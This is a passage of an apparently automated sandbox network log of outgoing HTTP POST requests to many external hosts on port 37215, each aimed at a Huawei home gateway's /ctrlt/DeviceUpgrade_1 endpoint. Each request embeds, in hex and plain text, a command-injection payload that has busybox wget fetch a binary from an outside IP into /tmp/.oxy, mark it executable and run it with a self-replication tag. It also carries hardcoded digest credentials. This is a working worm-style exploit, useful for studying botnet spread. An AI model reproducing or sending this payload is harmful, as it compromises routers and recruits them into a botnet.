                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1335192.168.2.1345860197.94.168.3137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.557614088 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1336192.168.2.135016041.220.30.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.557696104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1337192.168.2.1346052157.199.63.22637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.557961941 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1338192.168.2.1357930157.0.178.21537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.557990074 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1339192.168.2.1334546157.205.225.19237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.558038950 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1340192.168.2.1337702157.166.52.8837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.558042049 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1341192.168.2.1347996157.249.55.9637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.558100939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1342192.168.2.1347708157.185.54.11637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.558128119 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1343192.168.2.1346294197.208.202.6337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.558157921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1344192.168.2.1347188156.238.52.11937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.558161020 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
